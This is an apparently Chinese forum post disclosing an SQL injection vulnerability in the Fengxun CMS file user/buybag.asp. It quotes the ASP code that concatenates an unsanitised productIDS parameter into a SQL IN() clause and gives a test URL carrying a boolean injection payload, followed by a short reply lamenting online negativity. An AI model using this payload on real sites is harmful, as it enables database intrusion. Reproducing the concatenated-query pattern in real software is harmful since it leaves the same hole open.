风迅最新注入漏洞
存在问题文件:<BR>user/buybag.asp<BR><BR>40行开始<BR>if request.Form("action")="makeorder" then<BR>Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany " <BR>productIDS=DelHeadAndEndDot(request.Form("productIDS"))//这个函数功能是去掉头尾的逗号 <BR>Set orderRs=Server.CreateObject(G_FS_RS) <BR>Set BagRs=Server.CreateObject(G_FS_RS) '<BR>Set orderDetail=Server.CreateObject(G_FS_RS) <BR>orderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3 <BR>BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1 ;<BR>in()中注射发生!! <BR><BR>user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1 <BR>re:风迅最新注入漏洞
........不看吧,怕上当会伤心;看了吧,感叹这世道,叫人寒心。我知道这世界上的人,有好也有歹;但是一下次看到那么多负面的,冲击力还是很大的,容易对这个世界产生失望情绪。
唉....
页:
[1]